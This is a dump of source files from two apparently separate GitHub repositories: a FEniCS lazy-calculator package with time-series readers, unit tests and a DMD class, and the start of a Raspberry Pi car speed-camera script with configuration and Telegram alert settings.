the space on the recovered mesh.
'''
_, ext = os.path.splitext(path)
assert ext == '.pvd'
tree = ET.parse(path)
collection = list(tree.getroot())[0]
path = os.path.dirname(os.path.abspath(path))
# Read in paths/timestamps for VTUs. NOTE: as thus is supposed to be serial
# assert part 0
vtus, times = [], []
for dataset in collection:
assert dataset.attrib['part'] == '0'
vtus.append(os.path.join(path, dataset.attrib['file']))
times.append(float(dataset.attrib['timestep']))
vtus, times = vtus[slice(first, last, None)], times[slice(first, last, None)]
# path.vtu -> function. But vertex values!!!!
if not isinstance(V, FunctionSpace):
warning('Setting up P1 space on the recovered mesh')
cell_type = V.cell() # Dangerously assuming this is a UFL element
mesh = read_vtu_mesh(vtus[0], cell_type)
V = FunctionSpace(mesh, V)
V = get_P1_space(V)
functions = read_vtu_function(vtus, V)
ft_pairs = zip(functions, times)
return TempSeries(ft_pairs)
def XDMFTempSeries(path, V, first=0, last=None):
'''
Read in the temp series of functions in V from XDMF file. If V is not
a function space then a finite element has to be provided for constructing
the space on the recovered mesh.
'''
# NOTE: in 2017.2.0 fenics only stores vertex values so CG1 functions
# is what we go for
_, ext = os.path.splitext(path)
assert ext == '.xdmf'
tree = ET.parse(path)
domain = list(tree.getroot())[0]
grid = list(domain)[0]
times = [] # Only collect time stamps so that we access in right order
h5_file = '' # Consistency of piece as VisualisationVector ...
for item in grid:
_, __, time, attrib = list(item)
time = time.attrib['Value']
times.append(time)
piece = list(attrib)[0]
h5_file_, fdata = piece.text.split(':/')
assert not h5_file or h5_file == h5_file_
h5_file = h5_file_
times = times[slice(first, last, None)]
# We read visualization vector from this
h5_file = os.path.join(os.path.dirname(os.path.abspath(path)), h5_file)
if not isinstance(V, FunctionSpace):
warning('Setting up P1 space on the recovered mesh')
cell_type = V.cell() # Dangerously assuming this is a UFL element
mesh = read_h5_mesh(h5_file, cell_type)
V = FunctionSpace(mesh, V)
V = get_P1_space(V)
functions = read_h5_function(h5_file, times, V)
ft_pairs = zip(functions, map(float, times))
return TempSeries(ft_pairs)
|
MiroK/fenics-cacl | xcalc/__init__.py | <reponame>MiroK/fenics-cacl<filename>xcalc/__init__.py
from interpreter import Eval
|
MiroK/fenics-cacl | test/test_timeseries.py | <gh_stars>1-10
from xcalc.interpreter import Eval
from xcalc.timeseries import TempSeries, stream, clip
from itertools import izip
from dolfin import *
import numpy as np
import unittest
def error(true, me):
mesh = me.function_space().mesh()
return sqrt(abs(assemble(inner(me - true, me - true)*dx(domain=mesh))))
class TestCases(unittest.TestCase):
'''UnitTest for (some of) xcalc.timeseries'''
def test_fail_on_times(self):
mesh = UnitSquareMesh(2, 2)
V = FunctionSpace(mesh, 'DG', 0)
ft_pairs = ((Function(V), 0), (Function(V), -2))
with self.assertRaises(AssertionError):
TempSeries(ft_pairs)
def test_fail_on_spaces(self):
# Different element and degree in series
mesh = UnitSquareMesh(2, 2)
V = FunctionSpace(mesh, 'DG', 0)
W = FunctionSpace(mesh, 'CG', 1)
ft_pairs = ((Function(V), 0), (Function(W), 1))
with self.assertRaises(ValueError):
TempSeries(ft_pairs)
def test_algebra_fail_different_times(self):
mesh = UnitSquareMesh(2, 2)
V = FunctionSpace(mesh, 'DG', 0)
series0 = TempSeries(((Function(V), 0), (Function(V), 1)))
series1 = TempSeries(((Function(V), 0), (Function(V), 2)))
with self.assertRaises(AssertionError):
Eval(series0 - series1)
def test_algebra_fail_different_spaces(self):
mesh = UnitSquareMesh(2, 2)
V = FunctionSpace(mesh, 'DG', 0)
W = FunctionSpace(mesh, 'CG', 1)
series0 = TempSeries(((Function(V), 0), (Function(V), 1)))
series1 = TempSeries(((Function(W), 0), (Function(W), 1)))
with self.assertRaises(AssertionError):
Eval(series0 - series1)
def test_algebra(self):
mesh = UnitSquareMesh(2, 2)
V = FunctionSpace(mesh, 'DG', 0)
series0 = TempSeries([(interpolate(Constant(1), V), 0),
(interpolate(Constant(2), V), 1)])
series1 = TempSeries([(interpolate(Constant(2), V), 0),
(interpolate(Constant(3), V), 1)])
series01 = Eval(series1 - series0)
self.assertTrue(np.linalg.norm(series01.times - np.array([0, 1])) < 1E-14)
# Now each should be 1
for f in series01:
self.assertTrue(error(Constant(1), f) < 1E-14)
def test_vec_mag(self):
mesh = UnitSquareMesh(2, 2)
V = VectorFunctionSpace(mesh, 'CG', 1)
series = TempSeries([(interpolate(Expression(('x[0]', '0'), degree=1), V), 0),
(interpolate(Expression(('0', 'x[1]'), degree=1), V), 1)])
mag_series = Eval(sqrt(inner(series, series)))
self.assertTrue(error(Expression('x[0]', degree=1), mag_series.getitem(0)) < 1E-14)
self.assertTrue(error(Expression('x[1]', degree=1), mag_series.getitem(1)) < 1E-14)
def test_steam(self):
mesh = UnitSquareMesh(2, 2)
V = FunctionSpace(mesh, 'DG', 0)
series0 = TempSeries([(interpolate(Constant(1), V), 0),
(interpolate(Constant(2), V), 1)])
v = Function(V)
stream_series = stream(2*series0, v)
# NOTE: it is crucial that this is lazy. With normal zip
# v in all the pairse has the last value
for vi, v in izip(series0, stream_series):
self.assertTrue(error(2*vi, v) < 1E-14)
for i, v in enumerate(stream_series):
self.assertTrue(error(2*series0.getitem(i), v) < 1E-14)
def test_clip(self):
mesh = UnitSquareMesh(2, 2)
V = FunctionSpace(mesh, 'DG', 0)
series = TempSeries([(interpolate(Constant(1), V), 0),
(interpolate(Constant(2), V), 1),
(interpolate(Constant(3), V), 2),
(interpolate(Constant(4), V), 3)])
clipped_series = clip(series, 0, 3)
self.assertTrue(len(clipped_series)) == 2
self.assertEqual(clipped_series.times, (1, 2))
self.assertTrue(error(Constant(2), clipped_series.getitem(0)) < 1E-14)
self.assertTrue(error(Constant(3), clipped_series.getitem(1)) < 1E-14)
def test_get(self):
mesh = UnitSquareMesh(2, 2)
V = VectorFunctionSpace(mesh, 'CG', 1)
series = TempSeries([(interpolate(Expression(('x[0]', '0'), degree=1), V), 0),
(interpolate(Expression(('0', 'x[1]'), degree=1), V), 1)])
mag_series = Eval(series[0]) # series of first componentsts
self.assertTrue(error(Expression('x[0]', degree=1), mag_series.getitem(0)) < 1E-14)
self.assertTrue(error(Expression('0', degree=1), mag_series.getitem(1)) < 1E-14)
mag_series = Eval(series[1]) # series of secon componentsts
self.assertTrue(error(Expression('0', degree=1), mag_series.getitem(0)) < 1E-14)
self.assertTrue(error(Expression('x[1]', degree=1), mag_series.getitem(1)) < 1E-14)
def test_algebra_harder(self):
mesh = UnitSquareMesh(2, 2)
V = FunctionSpace(mesh, 'DG', 0)
series0 = TempSeries([(interpolate(Constant(2), V), 0),
(interpolate(Constant(3), V), 1)])
series1 = TempSeries([(interpolate(Constant(4), V), 0),
(interpolate(Constant(5), V), 1)])
series01 = Eval(series1**2 - 2*series0)
self.assertTrue(np.linalg.norm(series01.times - np.array([0, 1])) < 1E-14)
# Now each should be 1
for f, true in zip(series01, (Constant(12), Constant(19))):
self.assertTrue(error(true, f) < 1E-14)
|
MiroK/fenics-cacl | xcalc/dmdbase.py | # This code is taken from PyDMD https://github.com/mathLab/PyDMD
# It is included here for the sake of simplifying the installation
# on UiO machines
from __future__ import division
from os.path import splitext
from builtins import range
from builtins import object
from past.utils import old_div
import numpy as np
class DMDBase(object):
"""
Dynamic Mode Decomposition base class.
:param int svd_rank: rank truncation in SVD. If 0, the method computes the
optimal rank and uses it for truncation; if positive number, the method
uses the argument for the truncation; if -1, the method does not
compute truncation.
:param int tlsq_rank: rank truncation computing Total Least Square. Default
is 0, that means no truncation.
:param bool exact: flag to compute either exact DMD or projected DMD.
Default is False.
:param bool opt: flag to compute optimized DMD. Default is False.
:cvar dict original_time: dictionary that contains information about the
time window where the system is sampled:
- `t0` is the time of the first input snapshot;
- `tend` is the time of the last input snapshot;
- `dt` is the delta time between the snapshots.
:cvar dict dmd_time: dictionary that contains information about the time
window where the system is reconstructed:
- `t0` is the time of the first approximated solution;
- `tend` is the time of the last approximated solution;
- `dt` is the delta time between the approximated solutions.
"""
def __init__(self, svd_rank=0, tlsq_rank=0, exact=False, opt=False):
self.svd_rank = svd_rank
self.tlsq_rank = tlsq_rank
self.exact = exact
self.opt = opt
self.original_time = None
self.dmd_time = None
self._eigs = None
self._Atilde = None
self._modes = None # Phi
self._b = None # amplitudes
self._snapshots = None
self._snapshots_shape = None
@property
def dmd_timesteps(self):
"""
Get the timesteps of the reconstructed states.
:return: the time intervals of the original snapshots.
:rtype: numpy.ndarray
"""
return np.arange(self.dmd_time['t0'],
self.dmd_time['tend'] + self.dmd_time['dt'],
self.dmd_time['dt'])
@property
def original_timesteps(self):
"""
Get the timesteps of the original snapshot.
:return: the time intervals of the original snapshots.
:rtype: numpy.ndarray
"""
return np.arange(self.original_time['t0'],
self.original_time['tend'] + self.original_time['dt'],
self.original_time['dt'])
@property
def modes(self):
"""
Get the matrix containing the DMD modes, stored by column.
:return: the matrix containing the DMD modes.
:rtype: numpy.ndarray
"""
return self._modes
@property
def atilde(self):
"""
Get the reduced Koopman operator A, called A tilde.
:return: the reduced Koopman operator A.
:rtype: numpy.ndarray
"""
return self._Atilde
@property
def eigs(self):
"""
Get the eigenvalues of A tilde.
:return: the eigenvalues from the eigendecomposition of `atilde`.
:rtype: numpy.ndarray
"""
return self._eigs
@property
def dynamics(self):
"""
Get the time evolution of each mode.
:return: the matrix that contains all the time evolution, stored by
row.
:rtype: numpy.ndarray
"""
omega = old_div(np.log(self.eigs), self.original_time['dt'])
vander = np.exp(np.multiply(*np.meshgrid(omega, self.dmd_timesteps)))
return (vander * self._b).T
@property
def reconstructed_data(self):
"""
Get the reconstructed data.
:return: the matrix that contains the reconstructed snapshots.
:rtype: numpy.ndarray
"""
return self.modes.dot(self.dynamics)
@property
def snapshots(self):
"""
Get the original input data.
:return: the matrix that contains the original snapshots.
:rtype: numpy.ndarray
"""
return self._snapshots
def fit(self, X):
"""
Abstract method to fit the snapshots matrices.
Not implemented, it has to be implemented in subclasses.
"""
raise NotImplementedError(
'Subclass must implement abstract method {}.fit'.format(
self.__class__.__name__))
@staticmethod
def _col_major_2darray(X):
"""
Private method that takes as input the snapshots and stores them into a
2D matrix, by column. If the input data is already formatted as 2D
array, the method saves it, otherwise it also saves the original
snapshots shape and reshapes the snapshots.
:param X: the input snapshots.
:type X: int or numpy.ndarray
:return: the 2D matrix that contains the flatten snapshots, the shape
of original snapshots.
:rtype: numpy.ndarray, tuple
"""
# If the data is already 2D ndarray
if isinstance(X, np.ndarray) and X.ndim == 2:
return X, None
input_shapes = [np.asarray(x).shape for x in X]
if len(set(input_shapes)) is not 1:
raise ValueError('Snapshots have not the same dimension.')
snapshots_shape = input_shapes[0]
snapshots = np.transpose([np.asarray(x).flatten() for x in X])
return snapshots, snapshots_shape
@staticmethod
def _compute_tlsq(X, Y, tlsq_rank):
"""
Compute Total Least Square.
:param numpy.ndarray X: the first matrix;
:param numpy.ndarray Y: the second matrix;
:param int tlsq_rank: the rank for the truncation; If 0, the method
does not compute any noise reduction; if positive number, the
method uses the argument for the SVD truncation used in the TLSQ
method.
:return: the denoised matrix X, the denoised matrix Y
:rtype: numpy.ndarray, numpy.ndarray
References:
https://arxiv.org/pdf/1703.11004.pdf
https://arxiv.org/pdf/1502.03854.pdf
"""
# Do not perform tlsq
if tlsq_rank is 0:
return X, Y
V = np.linalg.svd(np.append(X, Y, axis=0), full_matrices=False)[-1]
rank = min(tlsq_rank, V.shape[0])
VV = V[:rank, :].conj().T.dot(V[:rank, :])
return X.dot(VV), Y.dot(VV)
@staticmethod
def _compute_svd(X, svd_rank):
"""
Truncated Singular Value Decomposition.
:param numpy.ndarray X: the matrix to decompose.
:param svd_rank: the rank for the truncation; If 0, the method computes
the optimal rank and uses it for truncation; if positive interger,
the method uses the argument for the truncation; if float between 0
and 1, the rank is the number of the biggest singular values that
are needed to reach the 'energy' specified by `svd_rank`; if -1,
the method does not compute truncation.
:type svd_rank: int or float
:return: the truncated left-singular vectors matrix, the truncated
singular values array, the truncated right-singular vectors matrix.
:rtype: numpy.ndarray, numpy.ndarray, numpy.ndarray
References:
Gavish, Matan, and <NAME>, The optimal hard threshold for
singular values is, IEEE Transactions on Information Theory 60.8
(2014): 5040-5053.
"""
U, s, V = np.linalg.svd(X, full_matrices=False)
V = V.conj().T
if svd_rank is 0:
omega = lambda x: 0.56 * x**3 - 0.95 * x**2 + 1.82 * x + 1.43
beta = np.divide(*sorted(X.shape))
tau = np.median(s) * omega(beta)
rank = np.sum(s > tau)
elif svd_rank > 0 and svd_rank < 1:
cumulative_energy = np.cumsum(s / s.sum())
rank = np.searchsorted(cumulative_energy, svd_rank) + 1
elif svd_rank >= 1 and isinstance(svd_rank, int):
rank = min(svd_rank, U.shape[1])
else:
rank = X.shape[1]
U = U[:, :rank]
V = V[:, :rank]
s = s[:rank]
return U, s, V
@staticmethod
def _build_lowrank_op(U, s, V, Y):
"""
Private method that computes the lowrank operator from the singular
value decomposition of matrix X and the matrix Y.
.. math::
\\mathbf{\\tilde{A}} =
\\mathbf{U}^* \\mathbf{Y} \\mathbf{X}^\\dagger \\mathbf{U} =
\\mathbf{U}^* \\mathbf{Y} \\mathbf{V} \\mathbf{S}^{-1}
:param numpy.ndarray U: 2D matrix that contains the left-singular
vectors of X, stored by column.
:param numpy.ndarray s: 1D array that contains the singular values of X.
:param numpy.ndarray V: 2D matrix that contains the right-singular
vectors of X, stored by row.
:param numpy.ndarray Y: input matrix Y.
:return: the lowrank operator
:rtype: numpy.ndarray
"""
return U.T.conj().dot(Y).dot(V) * np.reciprocal(s)
@staticmethod
def _eig_from_lowrank_op(Atilde, Y, U, s, V, exact):
"""
Private method that computes eigenvalues and eigenvectors of the
high-dimensional operator from the low-dimensional operator and the
input matrix.
:param numpy.ndarray Atilde: the lowrank operator.
:param numpy.ndarray Y: input matrix Y.
:param numpy.ndarray U: 2D matrix that contains the left-singular
vectors of X, stored by column.
:param numpy.ndarray s: 1D array that contains the singular values of X.
:param numpy.ndarray V: 2D matrix that contains the right-singular
vectors of X, stored by row.
:param bool exact: if True, the exact modes are computed; otherwise,
the projected ones are computed.
:return: eigenvalues, eigenvectors
:rtype: numpy.ndarray, numpy.ndarray
"""
lowrank_eigenvalues, lowrank_eigenvectors = np.linalg.eig(Atilde)
# Compute the eigenvectors of the high-dimensional operator
if exact:
eigenvectors = ((
Y.dot(V) * np.reciprocal(s)).dot(lowrank_eigenvectors))
else:
eigenvectors = U.dot(lowrank_eigenvectors)
# The eigenvalues are the same
eigenvalues = lowrank_eigenvalues
return eigenvalues, eigenvectors
@staticmethod
def _compute_amplitudes(modes, snapshots, eigs, opt):
"""
Compute the amplitude coefficients. If `opt` is False the amplitudes
are computed by minimizing the error between the modes and the first
snapshot; if `opt` is True the amplitudes are computed by minimizing
the error between the modes and all the snapshots, at the expense of
bigger computational cost.
:param numpy.ndarray modes: 2D matrix that contains the modes, stored
by column.
:param numpy.ndarray snapshots: 2D matrix that contains the original
snapshots, stored by column.
:param numpy.ndarray eigs: array that contains the eigenvalues of the
linear operator.
:param bool opt: flag for optimized dmd.
:return: the amplitudes array
:rtype: numpy.ndarray
"""
if opt:
L = np.concatenate(
[
modes.dot(np.diag(eigs**i))
for i in range(snapshots.shape[1])
],
axis=0)
b = np.reshape(snapshots, (-1, ), order='F')
a = np.linalg.lstsq(L, b)[0]
else:
a = np.linalg.lstsq(modes, snapshots.T[0])[0]
return a
class DMD(DMDBase):
"""
Dynamic Mode Decomposition
:param svd_rank: the rank for the truncation; If 0, the method computes the
optimal rank and uses it for truncation; if positive interger, the
method uses the argument for the truncation; if float between 0 and 1,
the rank is the number of the biggest singular values that are needed
to reach the 'energy' specified by `svd_rank`; if -1, the method does
not compute truncation.
:type svd_rank: int or float
:param int tlsq_rank: rank truncation computing Total Least Square. Default
is 0, that means TLSQ is not applied.
:param bool exact: flag to compute either exact DMD or projected DMD.
Default is False.
:param bool opt: flag to compute optimized DMD. Default is False.
"""
def fit(self, X):
"""
Compute the Dynamic Modes Decomposition to the input data.
:param X: the input snapshots.
:type X: numpy.ndarray or iterable
"""
self._snapshots, self._snapshots_shape = self._col_major_2darray(X)
n_samples = self._snapshots.shape[1]
X = self._snapshots[:, :-1]
Y = self._snapshots[:, 1:]
X, Y = self._compute_tlsq(X, Y, self.tlsq_rank)
U, s, V = self._compute_svd(X, self.svd_rank)
self._Atilde = self._build_lowrank_op(U, s, V, Y)
self._eigs, self._modes = self._eig_from_lowrank_op(
self._Atilde, Y, U, s, V, self.exact)
self._b = self._compute_amplitudes(self._modes, self._snapshots,
self._eigs, self.opt)
# Default timesteps
self.original_time = {'t0': 0, 'tend': n_samples - 1, 'dt': 1}
self.dmd_time = {'t0': 0, 'tend': n_samples - 1, 'dt': 1}
return self
|
MiroK/fenics-cacl | test/test_interpreter.py | <reponame>MiroK/fenics-cacl
from xcalc.interpreter import Eval
from dolfin import *
import numpy as np
import unittest
def error(true, me):
mesh = me.function_space().mesh()
return sqrt(abs(assemble(inner(me - true, me - true)*dx(domain=mesh))))
class TestCases(unittest.TestCase):
'''UnitTest for (some of) xcalc.interpreter (no timeseries)'''
def test_sanity0(self):
mesh = UnitSquareMesh(4, 4)
V = FunctionSpace(mesh, 'CG', 1)
f = Expression('x[0]', degree=1)
g = Expression('x[1]', degree=1)
a = 3
b = -2
u = interpolate(f, V)
v = interpolate(g, V)
expr = a*u + b*v
me = Eval(expr)
true = Expression('a*f+b*g', f=f, g=g, a=a, b=b, degree=1)
e = error(true, me)
self.assertTrue(e < 1E-14)
def test_sanity1(self):
mesh = UnitSquareMesh(5, 5)
T = TensorFunctionSpace(mesh, 'DG', 0)
u = interpolate(Expression((('x[0]', 'x[1]'),
('2*x[0]+x[1]', 'x[0]+3*x[1]')), degree=1), T)
expr = sym(u) + skew(u)
me = Eval(expr)
true = u
e = error(true, me)
self.assertTrue(e < 1E-14)
def test_sanity2(self):
mesh = UnitSquareMesh(5, 5)
T = TensorFunctionSpace(mesh, 'CG', 1)
A = interpolate(Expression((('x[0]', 'x[1]'),
('2*x[0]+x[1]', 'x[0]+3*x[1]')), degree=1), T)
expr = tr(sym(A) + skew(A))
me = Eval(expr)
true = Expression('x[0] + x[0] + 3*x[1]', degree=1)
e = error(true, me)
self.assertTrue(e < 1E-14)
def test_sanity3(self):
mesh = UnitSquareMesh(5, 5)
T = TensorFunctionSpace(mesh, 'CG', 1)
A = interpolate(Expression((('x[0]', 'x[1]'),
('2*x[0]+x[1]', 'x[0]+3*x[1]')), degree=1), T)
expr = (sym(A) + skew(A))[0, 0]
me = Eval(expr)
true = Expression('x[0]', degree=1)
e = error(true, me)
self.assertTrue(e < 1E-14)
def test_sanity4(self):
mesh = UnitSquareMesh(5, 5)
T = TensorFunctionSpace(mesh, 'CG', 1)
A = interpolate(Expression((('x[0]', 'x[1]'),
('2*x[0]+x[1]', 'x[0]+3*x[1]')), degree=1), T)
expr = (sym(A) + skew(A))[:, 0]
me = Eval(expr)
true = Expression(('x[0]', '2*x[0]+x[1]'), degree=1)
e = error(true, me)
self.assertTrue(e < 1E-14)
def test_sanity5(self):
mesh = UnitSquareMesh(5, 5)
T = TensorFunctionSpace(mesh, 'CG', 1)
A = interpolate(Expression((('1', 'x[0]'),
('2', 'x[1]')), degree=1), T)
expr = det(A)
me = Eval(expr)
true = Expression('x[1]-2*x[0]', degree=1)
e = error(true, me)
self.assertTrue(e < 1E-14)
def test_sanity6(self):
mesh = UnitCubeMesh(5, 5, 5)
T = TensorFunctionSpace(mesh, 'CG', 1)
A = interpolate(Expression((('x[0]', '0', '1'),
('0', '1', 'x[1]'),
('x[2]', '0', '1')), degree=1), T)
expr = det(A)
me = Eval(expr)
true = Expression('x[0]-x[2]', degree=1)
e = error(true, me)
self.assertTrue(e < 1E-14)
def test_sanity7(self):
mesh = UnitSquareMesh(5, 5)
T = TensorFunctionSpace(mesh, 'CG', 1)
A = interpolate(Expression((('1', 'x[0]'),
('2', 'x[1]')), degree=1), T)
V = VectorFunctionSpace(mesh, 'CG', 1)
v = interpolate(Expression(('x[0]+x[1]', '1'), degree=1), V)
me = Eval(dot(A, v))
true = Expression(('x[1]+2*x[0]', '2*x[0]+3*x[1]'), degree=1)
e = error(true, me)
self.assertTrue(e < 1E-14)
def test_sanity8(self):
mesh = UnitSquareMesh(5, 5)
T = TensorFunctionSpace(mesh, 'CG', 1)
A = interpolate(Expression((('1', 'x[0]'),
('2', 'x[1]')), degree=1), T)
V = VectorFunctionSpace(mesh, 'CG', 1)
v = interpolate(Expression(('x[0]+x[1]', '1'), degree=1), V)
me = Eval(dot(v, transpose(A)))
true = Expression(('x[1]+2*x[0]', '2*x[0]+3*x[1]'), degree=1)
e = error(true, me)
self.assertTrue(e < 1E-14)
def test_sanity8(self):
mesh = UnitSquareMesh(5, 5)
V = VectorFunctionSpace(mesh, 'CG', 1)
v0 = interpolate(Expression(('x[0]+x[1]', '1'), degree=1), V)
v1 = interpolate(Expression(('1', 'x[0]'), degree=1), V)
me = Eval(inner(v0, v1))
true = Expression('x[1]+2*x[0]', degree=1)
e = error(true, me)
self.assertTrue(e < 1E-14)
def test_sanity9(self):
mesh = UnitSquareMesh(5, 5)
V = FunctionSpace(mesh, 'CG', 1)
a0 = interpolate(Expression('x[0]', degree=1), V)
a1 = interpolate(Expression('x[1]', degree=1), V)
me = Eval(as_vector((a0, a1)))
x, y = SpatialCoordinate(mesh)
true = as_vector((x, y))
e = error(true, me)
self.assertTrue(e < 1E-14)
def test_sanity10(self):
mesh = UnitSquareMesh(5, 5)
V = FunctionSpace(mesh, 'CG', 1)
a0 = interpolate(Expression('x[0]', degree=1), V)
a1 = interpolate(Expression('x[1]', degree=1), V)
true = as_vector((as_vector((a0, a1)), as_vector((-a0, -a1))))
me = Eval(true)
e = error(true, me)
self.assertTrue(e < 1E-14)
def test_sanity11(self):
mesh = UnitSquareMesh(5, 5)
true = SpatialCoordinate(mesh)
me = Eval(true)
e = error(true, me)
self.assertTrue(e < 1E-14)
def test_sanity12(self):
mesh = UnitSquareMesh(5, 5)
x, y = SpatialCoordinate(mesh)
true = as_vector((x+y, x-y))
me = Eval(true)
e = error(true, me)
self.assertTrue(e < 1E-14)
def test_comp_tensor_row_slice(self):
mesh = UnitSquareMesh(4, 4)
x, y = SpatialCoordinate(mesh)
A = as_matrix(((x, 2*y), (3*y, 4*x)))
true = A[1, :]
me = Eval(true)
e = error(true, me)
self.assertTrue(e < 1E-14)
def test_comp_tensor_col_slice(self):
mesh = UnitSquareMesh(4, 4)
x, y = SpatialCoordinate(mesh)
A = as_matrix(((x, 2*y), (3*y, 4*x)))
true = A[:, 0]
me = Eval(true)
e = error(true, me)
self.assertTrue(e < 1E-14)
def test_comp_tensor_num_vec(self):
mesh = UnitSquareMesh(4, 4)
r = SpatialCoordinate(mesh)
true = Constant(2)*r
me = Eval(true)
e = error(true, me)
self.assertTrue(e < 1E-14)
def test_comp_tensor_mat_vec(self):
mesh = UnitSquareMesh(4, 4)
x, y = SpatialCoordinate(mesh)
A = as_matrix(((x, 2*y), (3*y, 4*x)))
V = VectorFunctionSpace(mesh, 'CG', 1)
b = interpolate(Constant((1, 2)), V)
true = A*b
me = Eval(true)
e = error(true, me)
self.assertTrue(e < 1E-14)
def test_comp_tensor_mat_mat(self):
mesh = UnitSquareMesh(4, 4)
T = TensorFunctionSpace(mesh, 'DG', 0)
A = interpolate(Constant(((1, 2), (3, 4))), T)
B = interpolate(Constant(((1, -2), (-1, 4))), T)
true = A*B
me = Eval(true)
e = error(true, me)
self.assertTrue(e < 1E-14)
def test_comp_tensor_mat_mat_mat(self):
mesh = UnitSquareMesh(4, 4)
T = TensorFunctionSpace(mesh, 'DG', 0)
A = interpolate(Constant(((1, 2), (3, 4))), T)
B = interpolate(Constant(((1, -2), (-1, 4))), T)
true = A*B*A
me = Eval(true)
e = error(true, me)
self.assertTrue(e < 1E-14)
def test_comp_tensor_mat_mat_vec(self):
mesh = UnitSquareMesh(4, 4)
T = TensorFunctionSpace(mesh, 'DG', 0)
A = interpolate(Constant(((1, 2), (3, 4))), T)
B = interpolate(Constant(((1, -2), (-1, 4))), T)
V = VectorFunctionSpace(mesh, 'DG', 0)
b = interpolate(Constant((-1, -2)), V)
true = A*B*b
me = Eval(true)
e = error(true, me)
self.assertTrue(e < 1E-14)
def test_comp_tensor_num_mat(self):
mesh = UnitSquareMesh(4, 4)
x, y = SpatialCoordinate(mesh)
A = as_matrix(((x, y), (y, -x)))
true = Constant(2)*A
me = Eval(true)
e = error(true, me)
self.assertTrue(e < 1E-14)
def test_min(self):
mesh = UnitSquareMesh(4, 4)
x, y = SpatialCoordinate(mesh)
true = Min(x, y)
me = Eval(true)
e = error(true, me)
self.assertTrue(e < 1E-14)
def test_max(self):
mesh = UnitSquareMesh(4, 4)
x, y = SpatialCoordinate(mesh)
true = Max(x+y, 2*y)
me = Eval(true)
e = error(true, me)
self.assertTrue(e < 1E-14)
def test_cond_simple_conv(self):
# Outside of CG1 with nonlinearity?
errors = []
for n in (4, 8, 16, 32, 64):
mesh = UnitSquareMesh(n, n)
x, y = SpatialCoordinate(mesh)
true = conditional(x < y, x+y, x-y)
me = Eval(true)
errors.append(error(true, me))
self.assertTrue((np.diff(errors) < 0).all())
def test_cond_simple(self):
mesh = UnitSquareMesh(4, 4)
V = FunctionSpace(mesh, 'DG', 0)
x = interpolate(Constant(1), V)
y = interpolate(Constant(2), V)
true = conditional(x < y, x+y, x-y)
me = Eval(true)
e = error(true, me)
self.assertTrue(e < 1E-14)
def test_cond_logic(self):
errors = []
for n in (4, 8, 16, 32, 64):
mesh = UnitSquareMesh(n, n)
x, y = SpatialCoordinate(mesh)
true = conditional(And(x < y, Constant(0) < x), x+y, x-y)
me = Eval(true)
errors.append(error(true, me))
self.assertTrue((np.diff(errors) < 0).all())
def test_cond_logic_simple(self):
# We're outside of the CG1!
mesh = UnitSquareMesh(4, 4)
V = FunctionSpace(mesh, 'DG', 0)
x = interpolate(Constant(1), V)
y = interpolate(Constant(2), V)
true = conditional(And(x < y, 0 < x), x+y, x-y)
me = Eval(true)
e = error(true, me)
self.assertTrue(e < 1E-14)
|
MiroK/fenics-cacl | setup.py | #!/usr/bin/env python
from distutils.core import setup
setup(name = 'fenics_calc',
version = '0.1',
description = 'Lazy calculator over FEniCS functons',
author = '<NAME>',
author_email = '<EMAIL>',
url = 'https://github.com/mirok/fenics-calc.git',
packages = ['xcalc'],
package_dir = {'xcalc': 'xcalc'}
)
|
stjohnjohnson/carspeed.py | speed-camera.py | # speed-camera v4.0
"""
Script to capture moving car speed
Usage:
speed-camera.py [preview] [--config=<file>]
Options:
-h --help Show this screen.
"""
# import the necessary packages
from docopt import docopt
from picamera import PiCamera
from picamera.array import PiRGBArray
from pathlib import Path
from datetime import datetime, timezone
import cv2
import numpy as np
import logging
import time
import math
import json
import yaml
import shutil
import telegram
import subprocess
from multiprocessing import Process
# Location for files/logs
FILENAME_SERVICE = "logs/service.log"
FILENAME_RECORD = "logs/recorded_speed.csv"
# Important constants
MIN_SAVE_BUFFER = 2
THRESHOLD = 25
BLURSIZE = (15,15)
# the following enumerated values are used to make the program more readable
WAITING = 0
TRACKING = 1
SAVING = 2
UNKNOWN = 0
LEFT_TO_RIGHT = 1
RIGHT_TO_LEFT = 2
class Config:
# monitoring area
upper_left_x = 0
upper_left_y = 0
lower_right_x = 1024
lower_right_y = 576
# range
l2r_distance = 65 # <---- distance-to-road in feet (left-to-right side)
r2l_distance = 80 # <---- distance-to-road in feet (right-to-left side)
# camera settings
fov = 62.2 # <---- field of view
fps = 30 # <---- frames per second
image_width = 1024 # <---- resolution width
image_height = 576 # <---- resolution height
image_min_area = 500 # <---- minimum area for detecting motion
camera_vflip = False # <---- flip camera vertically
camera_hflip = False # <---- flip camera horizontally
# thresholds for recording
min_distance = 0.4 # <---- minimum distance between cars
min_speed = 10 # <---- minimum speed for recording events
min_speed_alert = 30 # <---- minimum speed for sending an alert
min_area = 2000 # <---- minimum area for recording events
min_confidence = 70 # <---- minimum percentage confidence for recording events
min_confidence_alert = 90 # <---- minimum percentage confidence for saving images
# communication
telegram_token = "" # <---- bot token to authenticate with Telegram
telegram_chat_id = "" # <---- person/group `chat_id` to send the alert to
telegram_frequency = 6 # <---- hours between periodic text updates
@staticmethod
def load(config_file):
cfg = Config()
with open(config_file, 'r') as stream:
try:
data = yaml.safe_load(stream)
for key, value in data.items():
if hasattr(cfg, key):
setattr(cfg, key, value)
except yaml.YAMLError as exc:
logging.error("Failed to load config: {}".format(exc))
exit(1)
# Swap positions
if cfg.upper_left_x > cfg.lower_right_x:
cfg.upper_left_x = cfg.lower_right_x
cfg.lower_right_x = cfg.upper_left_x
if cfg.upper_left_y > cfg.lower_right_y:
cfg.upper_left_y = cfg.lower_right_y
cfg.lower_right_y = cfg.upper_left_y
cfg.upper_left = (cfg.upper_left_x, cfg.upper_left_y)
cfg.lower_right = (cfg.lower_right_x, cfg.lower_right_y)
cfg.monitored_width = cfg.lower_right_x - cfg.upper_left_x
cfg.monitored_height = cfg.lower_right_y - cfg.upper_left_y
cfg.resolution = [cfg.image_width, cfg.image_height]
return cfg
class Recorder:
min_speed = 10 # <---- minimum speed for recording events
min_speed_alert = 30 # <---- minimum speed for sending an alert
min_area = 2000 # <---- minimum area for recording events
min_confidence = 70 # <---- minimum percentage confidence for recording events
min_confidence_alert = 70 # <---- minimum percentage confidence for saving images
# communication
telegram_token = "" # <---- telegram bot token
telegram_chat_id = "" # <---- telegram chat ID
bot = None
# Location of the record
RECORD_FILENAME = 'logs/recorded_speed.csv'
RECORD_HEADERS = 'timestamp,speed,speed_deviation,area,area_deviation,frames,seconds,direction'
def __init__(self, cfg):
for key, value in cfg.__dict__.items():
if hasattr(self, key):
setattr(self, key, value)
